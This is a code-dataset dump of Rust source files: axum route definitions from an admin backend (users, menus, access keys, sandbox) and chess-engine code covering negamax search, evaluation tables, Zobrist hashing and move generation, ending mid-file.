repo stringlengths 6 65 | file_url stringlengths 81 311 | file_path stringlengths 6 227 | content stringlengths 0 32.8k | language stringclasses 1
value | license stringclasses 7
values | commit_sha stringlengths 40 40 | retrieved_at stringdate 2026-01-04 15:31:58 2026-01-04 20:25:31 | truncated bool 2
classes |
|---|---|---|---|---|---|---|---|---|
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/router/src/admin/sys_user_route.rs | server/router/src/admin/sys_user_route.rs | use axum::{
http::Method,
routing::{delete, get, post, put},
Router,
};
use server_api::admin::SysUserApi;
use server_global::global::{add_route, RouteInfo};
pub struct SysUserRouter;
impl SysUserRouter {
pub async fn init_user_router() -> Router {
let base_path = "/user";
let service_name = "SysUserApi";
let routes = vec![
RouteInfo::new(
&format!("{}/users", base_path),
Method::GET,
service_name,
"获取所有用户",
),
RouteInfo::new(base_path, Method::GET, service_name, "获取用户列表"),
RouteInfo::new(base_path, Method::POST, service_name, "创建用户"),
RouteInfo::new(
&format!("{}/:id", base_path),
Method::GET,
service_name,
"获取用户详情",
),
RouteInfo::new(base_path, Method::PUT, service_name, "更新用户"),
RouteInfo::new(
&format!("{}/:id", base_path),
Method::DELETE,
service_name,
"删除用户",
),
RouteInfo::new(
&format!("{}/add_policies", base_path),
Method::GET,
service_name,
"添加用户策略",
),
RouteInfo::new(
&format!("{}/remove_policies", base_path),
Method::GET,
service_name,
"删除用户策略",
),
];
for route in routes {
add_route(route).await;
}
let router = Router::new()
.route("/users", get(SysUserApi::get_all_users))
.route("/", get(SysUserApi::get_paginated_users))
.route("/", post(SysUserApi::create_user))
.route("/{id}", get(SysUserApi::get_user))
.route("/", put(SysUserApi::update_user))
.route("/{id}", delete(SysUserApi::delete_user))
.route("/add_policies", get(SysUserApi::add_policies))
.route("/remove_policies", get(SysUserApi::remove_policies));
Router::new().nest(base_path, router)
}
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/router/src/admin/sys_sandbox_route.rs | server/router/src/admin/sys_sandbox_route.rs | use axum::{routing::get, Router};
use server_api::admin::SysSandboxApi;
pub struct SysSandboxRouter;
impl SysSandboxRouter {
const BASE_PATH: &str = "/sandbox";
pub async fn init_simple_sandbox_router() -> Router {
let router =
Router::new().route("/simple-api-key", get(SysSandboxApi::test_simple_api_key));
Router::new().nest(Self::BASE_PATH, router)
}
pub async fn init_complex_sandbox_router() -> Router {
let router =
Router::new().route("/complex-api-key", get(SysSandboxApi::test_complex_api_key));
Router::new().nest(Self::BASE_PATH, router)
}
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/router/src/admin/sys_menu_route.rs | server/router/src/admin/sys_menu_route.rs | use axum::{
http::Method,
routing::{delete, get, post, put},
Router,
};
use server_api::admin::SysMenuApi;
use server_core::web::operation_log::OperationLogLayer;
use server_global::global::{add_route, RouteInfo};
pub struct SysMenuRouter;
impl SysMenuRouter {
pub async fn init_menu_router() -> Router {
let router = Router::new().route(
"/getConstantRoutes",
get(SysMenuApi::get_constant_routes).layer(OperationLogLayer::new(true)),
);
Router::new().nest("/route", router)
}
pub async fn init_protected_menu_router() -> Router {
let base_path = "/route";
let service_name = "SysMenuApi";
let routes = vec![
RouteInfo::new(
&format!("{}/tree", base_path),
Method::GET,
service_name,
"获取菜单树",
),
RouteInfo::new(base_path, Method::GET, service_name, "获取菜单列表"),
RouteInfo::new(base_path, Method::POST, service_name, "创建菜单"),
RouteInfo::new(
&format!("{}/:id", base_path),
Method::GET,
service_name,
"获取菜单详情",
),
RouteInfo::new(base_path, Method::PUT, service_name, "更新菜单"),
RouteInfo::new(
&format!("{}/:id", base_path),
Method::DELETE,
service_name,
"删除菜单",
),
RouteInfo::new(
&format!("{}/auth-route/:roleId", base_path),
Method::GET,
service_name,
"获取角色菜单",
),
];
for route in routes {
add_route(route).await;
}
let router = Router::new()
.route("/tree", get(SysMenuApi::tree_menu))
.route("/", get(SysMenuApi::get_menu_list))
.route("/", post(SysMenuApi::create_menu))
.route("/{id}", get(SysMenuApi::get_menu))
.route("/", put(SysMenuApi::update_menu))
.route("/{id}", delete(SysMenuApi::delete_menu))
.route("/auth-route/{roleId}", get(SysMenuApi::get_auth_routes));
Router::new().nest(base_path, router)
}
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/router/src/admin/sys_access_key_route.rs | server/router/src/admin/sys_access_key_route.rs | use axum::{
http::Method,
routing::{delete, get, post},
Router,
};
use server_api::admin::SysAccessKeyApi;
use server_global::global::{add_route, RouteInfo};
pub struct SysAccessKeyRouter;
impl SysAccessKeyRouter {
pub async fn init_access_key_router() -> Router {
let base_path = "/access-key";
let service_name = "SysAccessKeyApi";
let routes = vec![
RouteInfo::new(base_path, Method::GET, service_name, "获取访问密钥列表"),
RouteInfo::new(base_path, Method::POST, service_name, "创建访问密钥"),
RouteInfo::new(
&format!("{}/:id", base_path),
Method::DELETE,
service_name,
"删除访问密钥",
),
];
for route in routes {
add_route(route).await;
}
let router = Router::new()
.route("/", get(SysAccessKeyApi::get_paginated_access_keys))
.route("/", post(SysAccessKeyApi::create_access_key))
.route("/{id}", delete(SysAccessKeyApi::delete_access_key));
Router::new().nest(base_path, router)
}
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
soybeanjs/soybean-admin-rust | https://github.com/soybeanjs/soybean-admin-rust/blob/a560191ee087ba509e2060f17937b9f2c8f9be33/server/shared/src/lib.rs | server/shared/src/lib.rs | pub fn add(left: usize, right: usize) -> usize {
left + right
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn it_works() {
let result = add(2, 2);
assert_eq!(result, 4);
}
}
| rust | Apache-2.0 | a560191ee087ba509e2060f17937b9f2c8f9be33 | 2026-01-04T20:21:43.261270Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/prng.rs | chrs-lib/src/prng.rs | use rand::prelude::*;
use rand_chacha::ChaCha20Rng;
use std::cell::RefCell;
thread_local! {
pub static PRNG: RefCell<ChaCha20Rng> = RefCell::new(ChaCha20Rng::seed_from_u64(234239432));
}
pub fn random_u64() -> u64 {
PRNG.with(|rng| rng.borrow_mut().gen())
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/lib.rs | chrs-lib/src/lib.rs | pub mod ai;
pub mod data;
pub mod generator;
pub mod zobrist;
mod prng;
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/ai/transposition.rs | chrs-lib/src/ai/transposition.rs | use std::collections::HashMap;
use crate::data::Move;
#[derive(Debug, Default)]
pub enum SearchFlag {
#[default]
Exact,
Lowerbound,
Upperbound,
}
#[derive(Debug, Default)]
pub struct TTEntry {
pub depth: usize,
pub flag: SearchFlag,
pub best: Option<Move>,
pub value: i32,
}
pub type TT = HashMap<u64, TTEntry>;
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/ai/negamax.rs | chrs-lib/src/ai/negamax.rs | use super::eval::*;
use super::transposition::{SearchFlag, TT};
use super::{AIStat, AI};
use crate::{
data::{BoardConfig, Move},
generator::MoveGenerator,
};
use instant::Instant;
pub struct NegaMaxAI {
pub depth: usize,
pub quiescence_depth: usize,
pub stats: AIStat,
killer_moves: [[Option<Move>; Self::MAX_DEPTH]; 2],
history_moves: [[i32; 64]; 12],
table: TT,
pv_length: [usize; 64],
pv_table: [[Option<Move>; 64]; 64],
score_pv: bool,
follow_pv: bool,
}
impl Default for NegaMaxAI {
fn default() -> Self {
Self {
depth: 5,
quiescence_depth: 4,
stats: Default::default(),
killer_moves: [[None; Self::MAX_DEPTH]; 2],
history_moves: [[0; Self::MAX_DEPTH]; 12],
table: Default::default(),
pv_length: [0; Self::MAX_DEPTH],
pv_table: [[None; Self::MAX_DEPTH]; Self::MAX_DEPTH],
score_pv: false,
follow_pv: false,
}
}
}
impl NegaMaxAI {
const MIN: i32 = -50000;
const MAX: i32 = 50000;
const MATING_SCORE: i32 = -49000;
const MAX_DEPTH: usize = 64;
pub fn new(depth: usize, qdepth: usize) -> Self {
let mut ai = Self::default();
ai.depth = depth;
ai.quiescence_depth = qdepth;
ai
}
fn score_move(&mut self, m: &Move, ply: usize) -> i32 {
if self.score_pv && self.pv_table[0][ply] == Some(*m) {
self.score_pv = false;
self.follow_pv = true;
return 20000;
}
if m.capture.is_some() {
return score_mvv_lva(m);
} else {
if self.killer_moves[0][ply] == Some(*m) {
return 9000;
} else if self.killer_moves[1][ply] == Some(*m) {
return 8000;
} else {
return self.history_moves[m.p as usize][m.to as usize];
}
}
}
fn nega_max(
&mut self,
config: &mut BoardConfig,
gen: &MoveGenerator,
mut alpha: i32,
mut beta: i32,
depth: usize,
ply: usize,
) -> i32 {
self.stats.node_count += 1;
self.stats.max_depth = usize::max(self.stats.max_depth, depth);
self.pv_length[ply] = ply;
let alpha_orig = alpha;
if let Some(entry) = self.table.get(&config.get_hash()) {
if entry.depth >= depth {
match entry.flag {
SearchFlag::Exact => {
self.pv_table[ply][ply] = entry.best;
for next_ply in (ply + 1)..self.pv_length[ply + 1] {
self.pv_table[ply][next_ply] = self.pv_table[ply + 1][next_ply];
}
self.pv_length[ply] = self.pv_length[ply + 1];
return entry.value;
}
SearchFlag::Lowerbound => alpha = i32::max(alpha, entry.value),
SearchFlag::Upperbound => beta = i32::min(beta, entry.value),
};
}
if alpha >= beta {
return entry.value;
}
}
if depth == 0 {
return self.quiescence(config, gen, alpha, beta, self.quiescence_depth, ply + 1);
}
if ply > Self::MAX_DEPTH - 1 {
return evaluate(config);
}
let in_check = config.is_king_in_check(gen, config.get_active_color());
let mut value = Self::MIN;
let mut moves = gen.gen_all_moves(config.get_active_color(), config, false);
if self.follow_pv {
if moves.iter().any(|m| self.pv_table[0][ply] == Some(*m)) {
self.score_pv = true;
self.follow_pv = true;
} else {
self.follow_pv = false;
}
}
moves.sort_by(|a, b| self.score_move(b, ply).cmp(&self.score_move(a, ply)));
for m in moves.iter() {
if let Some(commit) = config.make_move(*m) {
value = i32::max(
value,
-self.nega_max(config, gen, -beta, -alpha, depth - 1, ply + 1),
);
config.undo_commit(&commit);
if value >= beta {
if m.capture.is_none() {
self.killer_moves[1][ply] = self.killer_moves[0][ply];
self.killer_moves[0][ply] = Some(*m);
}
break;
}
if value > alpha {
alpha = value;
self.pv_table[ply][ply] = Some(*m);
for next_ply in (ply + 1)..self.pv_length[ply + 1] {
self.pv_table[ply][next_ply] = self.pv_table[ply + 1][next_ply];
}
self.pv_length[ply] = self.pv_length[ply + 1];
if m.capture.is_none() {
self.history_moves[m.p as usize][m.to as usize] += (depth * depth) as i32;
}
}
}
}
if moves.len() == 0 {
if in_check {
return Self::MATING_SCORE + ply as i32;
} else {
return 0;
}
}
let entry = self
.table
.entry(config.get_hash())
.or_insert(Default::default());
entry.value = value;
if value <= alpha_orig {
entry.flag = SearchFlag::Upperbound;
} else if value >= beta {
entry.flag = SearchFlag::Lowerbound;
} else {
entry.flag = SearchFlag::Exact;
}
entry.best = self.pv_table[ply][ply];
entry.depth = depth;
value
}
fn quiescence(
&mut self,
config: &mut BoardConfig,
gen: &MoveGenerator,
mut alpha: i32,
beta: i32,
depth: usize,
ply: usize,
) -> i32 {
self.stats.node_count += 1;
self.stats.max_depth = usize::max(self.stats.max_depth, depth);
let eval = evaluate(config);
if depth == 0 {
return eval;
}
if eval >= beta {
return beta;
}
alpha = i32::max(alpha, eval);
let mut moves = gen.gen_all_moves(config.get_active_color(), config, true);
moves.sort_by(|a, b| self.score_move(b, ply).cmp(&self.score_move(a, ply)));
for m in moves.iter() {
assert!(m.capture.is_some());
if let Some(commit) = config.make_move(*m) {
let score = -self.quiescence(config, gen, -beta, -alpha, depth - 1, ply + 1);
config.undo_commit(&commit);
if score >= beta {
return beta;
}
alpha = i32::max(alpha, score);
}
}
alpha
}
}
impl AI for NegaMaxAI {
fn get_best_move(&mut self, config: &BoardConfig, gen: &MoveGenerator) -> Option<Move> {
self.stats = Default::default();
self.history_moves = [[0; 64]; 12];
self.killer_moves = [[None; Self::MAX_DEPTH]; 2];
self.pv_length = [0; 64];
self.pv_table = [[None; 64]; 64];
self.score_pv = false;
self.follow_pv = false;
let mut config = config.clone();
let now = Instant::now();
for current_depth in 1..(self.depth + 1) {
self.follow_pv = true;
self.stats.node_count = 0;
self.nega_max(&mut config, gen, Self::MIN, Self::MAX, current_depth, 0);
}
// self.nega_max(&mut config, gen, Self::MIN, Self::MAX, self.depth, 0);
self.stats.time = now.elapsed();
self.pv_table[0][0]
}
fn get_stats(&self) -> AIStat {
self.stats
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/ai/mod.rs | chrs-lib/src/ai/mod.rs | mod eval;
mod negamax;
mod transposition;
use crate::data::{BoardConfig, Move};
use crate::generator::MoveGenerator;
pub use negamax::NegaMaxAI;
use std::time::Duration;
pub trait AI {
fn get_best_move(&mut self, config: &BoardConfig, gen: &MoveGenerator) -> Option<Move>;
fn get_stats(&self) -> AIStat;
}
#[derive(Default, Copy, Clone, Debug)]
pub struct AIStat {
pub node_count: usize,
pub time: Duration,
pub max_depth: usize,
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/ai/eval.rs | chrs-lib/src/ai/eval.rs | use crate::data::{BoardConfig, BoardPiece, Color, Move, Square};
use strum::IntoEnumIterator;
const MATERIAL_SCORE: [i32; 12] = [
100, 300, 350, 500, 1000, 10000, -100, -300, -350, -500, -1000, -10000,
];
#[rustfmt::skip]
const PAWN_SCORE: [i32; 64] =
[
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, -10, -10, 0, 0, 0,
0, 0, 0, 5, 5, 0, 0, 0,
5, 5, 10, 20, 20, 5, 5, 5,
10, 10, 10, 20, 20, 10, 10, 10,
20, 20, 20, 30, 30, 30, 20, 20,
30, 30, 30, 40, 40, 30, 30, 30,
90, 90, 90, 90, 90, 90, 90, 90
];
// knight positional score
#[rustfmt::skip]
const KNIGHT_SCORE: [i32; 64] =
[
-5, -10, 0, 0, 0, 0, -10, -5,
-5, 0, 0, 0, 0, 0, 0, -5,
-5, 5, 20, 10, 10, 20, 5, -5,
-5, 10, 20, 30, 30, 20, 10, -5,
-5, 10, 20, 30, 30, 20, 10, -5,
-5, 5, 20, 20, 20, 20, 5, -5,
-5, 0, 0, 10, 10, 0, 0, -5,
-5, 0, 0, 0, 0, 0, 0, -5
];
// bishop positional score
#[rustfmt::skip]
const BISHOP_SCORE: [i32; 64] =
[
0, 0, -10, 0, 0, -10, 0, 0,
0, 30, 0, 0, 0, 0, 30, 0,
0, 10, 0, 0, 0, 0, 10, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 0, 10, 10, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0
];
// rook positional score
#[rustfmt::skip]
const ROOK_SCORE: [i32; 64] =
[
0, 0, 0, 20, 20, 0, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
0, 0, 10, 20, 20, 10, 0, 0,
50, 50, 50, 50, 50, 50, 50, 50,
50, 50, 50, 50, 50, 50, 50, 50
];
// king positional score
#[rustfmt::skip]
const KING_SCORE: [i32; 64] =
[
0, 0, 5, 0, -15, 0, 10, 0,
0, 5, 5, -5, -5, 0, 5, 0,
0, 0, 5, 10, 10, 5, 0, 0,
0, 5, 10, 20, 20, 10, 5, 0,
0, 5, 10, 20, 20, 10, 5, 0,
0, 5, 5, 10, 10, 5, 5, 0,
0, 0, 5, 5, 5, 5, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0
];
const fn get_pawn_score(sq: Square, c: Color) -> i32 {
match c {
Color::White => PAWN_SCORE[sq as usize],
Color::Black => PAWN_SCORE[sq.mirror() as usize],
}
}
const fn get_knight_score(sq: Square, c: Color) -> i32 {
match c {
Color::White => KNIGHT_SCORE[sq as usize],
Color::Black => KNIGHT_SCORE[sq.mirror() as usize],
}
}
const fn get_bishop_score(sq: Square, c: Color) -> i32 {
match c {
Color::White => BISHOP_SCORE[sq as usize],
Color::Black => BISHOP_SCORE[sq.mirror() as usize],
}
}
const fn get_rook_score(sq: Square, c: Color) -> i32 {
match c {
Color::White => ROOK_SCORE[sq as usize],
Color::Black => ROOK_SCORE[sq.mirror() as usize],
}
}
const fn get_king_score(sq: Square, c: Color) -> i32 {
match c {
Color::White => KING_SCORE[sq as usize],
Color::Black => KING_SCORE[sq.mirror() as usize],
}
}
pub fn evaluate(config: &BoardConfig) -> i32 {
let mut score = 0;
use BoardPiece::*;
for p in BoardPiece::iter() {
let mut bb = config.bitboards[p as usize];
while *bb > 0 {
let pos = bb.pop_sq().unwrap();
let mat_score = MATERIAL_SCORE[p as usize];
let pos_score = match p {
WhiteKing | BlackKing => get_king_score(pos, p.get_color()),
WhitePawn | BlackPawn => get_pawn_score(pos, p.get_color()),
WhiteRook | BlackRook => get_rook_score(pos, p.get_color()),
// WhiteQueen | BlackQueen => get_queen_score(pos, p.get_color()),
WhiteQueen | BlackQueen => 0,
WhiteBishop | BlackBishop => get_bishop_score(pos, p.get_color()),
WhiteKnight | BlackKnight => get_knight_score(pos, p.get_color()),
};
score += match p.get_color() {
Color::White => mat_score + pos_score,
Color::Black => mat_score - pos_score,
}
}
}
score
}
#[rustfmt::skip]
const MVV_LVA: [[i32; 12]; 12] = [
[105, 205, 305, 405, 505, 605, 105, 205, 305, 405, 505, 605],
[104, 204, 304, 404, 504, 604, 104, 204, 304, 404, 504, 604],
[103, 203, 303, 403, 503, 603, 103, 203, 303, 403, 503, 603],
[102, 202, 302, 402, 502, 602, 102, 202, 302, 402, 502, 602],
[101, 201, 301, 401, 501, 601, 101, 201, 301, 401, 501, 601],
[100, 200, 300, 400, 500, 600, 100, 200, 300, 400, 500, 600],
[105, 205, 305, 405, 505, 605, 105, 205, 305, 405, 505, 605],
[104, 204, 304, 404, 504, 604, 104, 204, 304, 404, 504, 604],
[103, 203, 303, 403, 503, 603, 103, 203, 303, 403, 503, 603],
[102, 202, 302, 402, 502, 602, 102, 202, 302, 402, 502, 602],
[101, 201, 301, 401, 501, 601, 101, 201, 301, 401, 501, 601],
[100, 200, 300, 400, 500, 600, 100, 200, 300, 400, 500, 600],
];
pub fn score_mvv_lva(m: &Move) -> i32 {
if m.capture.is_none() {
return 0;
}
let atk = m.p;
let victim = m.capture.unwrap();
MVV_LVA[atk as usize][victim as usize]
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/zobrist/mod.rs | chrs-lib/src/zobrist/mod.rs | use crate::data::{BoardConfig, BoardPiece, Color, Square};
use crate::prng::*;
use lazy_static::lazy_static;
lazy_static! {
pub static ref PIECE_KEYS: [[u64; 12]; 64] = {
let mut t = [[0; 12]; 64];
let mut i = 0;
while i < 64 {
let mut p = 0;
while p < 12 {
t[i][p] = random_u64();
p += 1;
}
i += 1;
}
t
};
pub static ref EP_KEYS: [u64; 64] = {
let mut t = [0; 64];
let mut i = 0;
while i < 64 {
t[i] = random_u64();
i += 1;
}
t
};
pub static ref CASTLE_KEYS: [u64; 16] = {
let mut t = [0; 16];
let mut i = 0;
while i < 16 {
t[i] = random_u64();
i += 1;
}
t
};
pub static ref BLACK_TO_MOVE: u64 = random_u64();
}
pub fn hash(config: &BoardConfig) -> u64 {
let mut key: u64 = 0;
for i in 0..64 {
if let Some(p) = config.get_at_sq(Square::try_from(i).unwrap()) {
key ^= PIECE_KEYS[i][p as usize];
}
}
if let Some(t) = config.get_en_passant_target() {
key ^= EP_KEYS[t as usize];
}
key ^= CASTLE_KEYS[config.get_castle_flags_raw() as usize];
if config.get_active_color() == Color::Black {
key ^= *BLACK_TO_MOVE;
}
key
}
pub fn update_piece(sq: Square, p: BoardPiece, key: &mut u64) {
*key ^= PIECE_KEYS[sq as usize][p as usize];
}
pub fn update_ep(sq: Square, key: &mut u64) {
*key ^= EP_KEYS[sq as usize];
}
pub fn update_castle(c: u8, key: &mut u64) {
*key ^= CASTLE_KEYS[c as usize];
}
pub fn update_side(side: Color, key: &mut u64) {
if side == Color::White {
*key ^= *BLACK_TO_MOVE;
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/generator/mod.rs | chrs-lib/src/generator/mod.rs | pub mod tables;
use crate::data::{
BitBoard, BoardConfig, BoardPiece, Color, Move, MoveList, MoveType, Square, B_PIECES, W_PIECES,
};
use tables::*;
pub struct MoveGenerator {
rook_magics: [MagicEntry; 64],
bishop_magics: [MagicEntry; 64],
rook_moves: Vec<BitBoard>,
bishop_moves: Vec<BitBoard>,
}
impl Default for MoveGenerator {
fn default() -> Self {
let mut rook_magics = [MagicEntry::default(); 64];
let mut bishop_magics = [MagicEntry::default(); 64];
let mut rook_moves: Vec<BitBoard> = vec![];
let mut bishop_moves: Vec<BitBoard> = vec![];
log::info!("Generating Magic Entries");
for i in 0..64 {
let (mut bishop_magic, mut bishop_move_tbl) = find_magic(i, BoardPiece::WhiteBishop);
bishop_magic.offset = bishop_moves.len();
bishop_magics[i] = bishop_magic;
bishop_moves.append(&mut bishop_move_tbl);
log::trace!(
"Bishop Magic Entry for square {i}\nMagic: {:?}",
bishop_magic
);
let (mut rook_magic, mut rook_move_tbl) = find_magic(i, BoardPiece::WhiteRook);
rook_magic.offset = rook_moves.len();
rook_magics[i] = rook_magic;
rook_moves.append(&mut rook_move_tbl);
log::trace!("Rook Magic Entry for square {i}\nMagic: {:?}", rook_magic);
}
log::info!("Done Generating Magic Entires");
MoveGenerator {
rook_magics,
bishop_magics,
rook_moves,
bishop_moves,
}
}
}
impl MoveGenerator {
pub fn update_state(&self, config: &mut BoardConfig) {
let sq = match config.get_active_color() {
Color::White => config.bitboards[BoardPiece::WhiteKing as usize].peek(),
Color::Black => config.bitboards[BoardPiece::BlackKing as usize].peek(),
};
let is_attacked = self.is_sq_attacked(sq.unwrap(), !config.get_active_color(), config);
let can_move = self
.gen_all_moves(config.get_active_color(), config, false)
.len()
> 0;
if is_attacked && !can_move {
config.set_mate(config.get_active_color());
} else if !can_move {
config.set_stalemate();
}
}
pub fn gen_all_moves(
&self,
side: Color,
config: &mut BoardConfig,
only_captures: bool,
) -> MoveList {
let pieces = match side {
Color::White => &W_PIECES,
Color::Black => &B_PIECES,
};
let mut moves = MoveList::new();
for p in pieces {
let mut bb = config.bitboards[*p as usize];
while *bb > 0 {
let pos = bb.pop_sq().unwrap();
self.gen_piece_moves_impl(*p, pos, config, only_captures, &mut moves);
}
}
moves
}
pub fn gen_piece_moves(
&self,
piece: BoardPiece,
pos: Square,
config: &mut BoardConfig,
only_captures: bool,
) -> MoveList {
let mut list = MoveList::with_capacity(32);
self.gen_piece_moves_impl(piece, pos, config, only_captures, &mut list);
list
}
fn gen_piece_moves_impl(
&self,
piece: BoardPiece,
pos: Square,
config: &mut BoardConfig,
only_captures: bool,
list: &mut MoveList,
) {
use BoardPiece::*;
// let mut config = config.clone();
let (friendly, enemy) = match piece.get_color() {
Color::White => (config.white_occupancy(), config.black_occupancy()),
Color::Black => (config.black_occupancy(), config.white_occupancy()),
};
let blockers = config.all_occupancy();
let mut ep_moves = BitBoard::default();
let moves = match piece {
WhiteRook => self.get_rook_moves(pos, blockers, friendly),
BlackRook => self.get_rook_moves(pos, blockers, friendly),
WhiteBishop => self.get_bishop_moves(pos, blockers, friendly),
BlackBishop => self.get_bishop_moves(pos, blockers, friendly),
WhiteKnight => self.get_knight_atk(pos) & !friendly,
BlackKnight => self.get_knight_atk(pos) & !friendly,
WhiteQueen => {
self.get_rook_moves(pos, blockers, friendly)
| self.get_bishop_moves(pos, blockers, friendly)
}
BlackQueen => {
self.get_rook_moves(pos, blockers, friendly)
| self.get_bishop_moves(pos, blockers, friendly)
}
WhiteKing => {
let all = config.all_occupancy();
let mut moves = self.get_king_atk(pos) & !friendly;
if pos == Square::E1 && config.get_can_white_castle_kingside() {
if !(all.is_set(Square::F1) || all.is_set(Square::G1))
&& !self.is_sq_attacked(Square::F1, Color::Black, config)
{
moves.set(Square::G1);
}
}
if pos == Square::E1 && config.get_can_white_castle_queenside() {
if !(all.is_set(Square::B1) || all.is_set(Square::C1) || all.is_set(Square::D1))
&& !self.is_sq_attacked(Square::D1, Color::Black, config)
{
moves.set(Square::C1);
}
}
moves
}
BlackKing => {
let all = config.all_occupancy();
let mut moves = self.get_king_atk(pos) & !friendly;
if pos == Square::E8 && config.get_can_black_castle_kingside() {
if !(all.is_set(Square::F8) || all.is_set(Square::G8))
&& !self.is_sq_attacked(Square::F8, Color::White, config)
{
moves.set(Square::G8);
}
}
if pos == Square::E8 && config.get_can_black_castle_queenside() {
if !(all.is_set(Square::B8) || all.is_set(Square::C8) || all.is_set(Square::D8))
&& !self.is_sq_attacked(Square::D8, Color::White, config)
{
moves.set(Square::C8);
}
}
moves
}
WhitePawn => {
let quiet = {
if pos < Square::A8 {
// not in rank 8
let single = BitBoard::from(1 << (pos as usize + 8)) & !friendly & !enemy;
if pos >= Square::A2 && pos <= Square::H2 && single.non_zero() {
(single | BitBoard::from(1 << (pos as usize + 16))) & !friendly & !enemy
} else {
single
}
} else {
BitBoard::from(0)
}
};
let atks = self.get_white_pawn_atk(pos);
let moves = quiet | (atks & enemy);
if let Some(t) = config.get_en_passant_target() {
if *atks & (1 << t as usize) > 0 {
*ep_moves |= 1 << t as usize;
}
}
moves
}
BlackPawn => {
let quiet = {
if pos > Square::H1 {
// not in rank 1
let single = BitBoard::from(1 << (pos as usize - 8)) & !friendly & !enemy;
if pos >= Square::A7 && pos <= Square::H7 && single.non_zero() {
(single | BitBoard::from(1 << (pos as usize - 16))) & !friendly & !enemy
} else {
single
}
} else {
BitBoard::from(0)
}
};
let atks = self.get_black_pawn_atk(pos);
let moves = quiet | (atks & enemy);
if let Some(t) = config.get_en_passant_target() {
if *atks & (1 << t as usize) > 0 {
*ep_moves |= 1 << t as usize;
}
}
moves
}
};
if only_captures {
self.make_movelist((moves & enemy) | ep_moves, pos, config, list)
} else {
self.make_movelist(moves | ep_moves, pos, config, list)
}
}
pub fn is_sq_attacked(&self, sq: Square, color: Color, config: &BoardConfig) -> bool {
match color {
Color::White => {
if (self.get_black_pawn_atk(sq) & config.get_piece_occupancy(BoardPiece::WhitePawn))
.non_zero()
{
return true;
} else if (self.get_knight_atk(sq)
& config.get_piece_occupancy(BoardPiece::WhiteKnight))
.non_zero()
{
return true;
} else if (self.get_king_atk(sq)
& config.get_piece_occupancy(BoardPiece::WhiteKing))
.non_zero()
{
return true;
} else if (self.get_bishop_atk(sq, config.all_occupancy())
& (config.get_piece_occupancy(BoardPiece::WhiteBishop)
| config.get_piece_occupancy(BoardPiece::WhiteQueen)))
.non_zero()
{
return true;
} else if (self.get_rook_atk(sq, config.all_occupancy())
& (config.get_piece_occupancy(BoardPiece::WhiteRook)
| config.get_piece_occupancy(BoardPiece::WhiteQueen)))
.non_zero()
{
return true;
} else {
return false;
}
}
Color::Black => {
if (self.get_white_pawn_atk(sq) & config.get_piece_occupancy(BoardPiece::BlackPawn))
.non_zero()
{
return true;
} else if (self.get_knight_atk(sq)
& config.get_piece_occupancy(BoardPiece::BlackKnight))
.non_zero()
{
return true;
} else if (self.get_king_atk(sq)
& config.get_piece_occupancy(BoardPiece::BlackKing))
.non_zero()
{
return true;
} else if (self.get_bishop_atk(sq, config.all_occupancy())
& (config.get_piece_occupancy(BoardPiece::BlackBishop)
| config.get_piece_occupancy(BoardPiece::BlackQueen)))
.non_zero()
{
return true;
} else if (self.get_rook_atk(sq, config.all_occupancy())
& (config.get_piece_occupancy(BoardPiece::BlackRook)
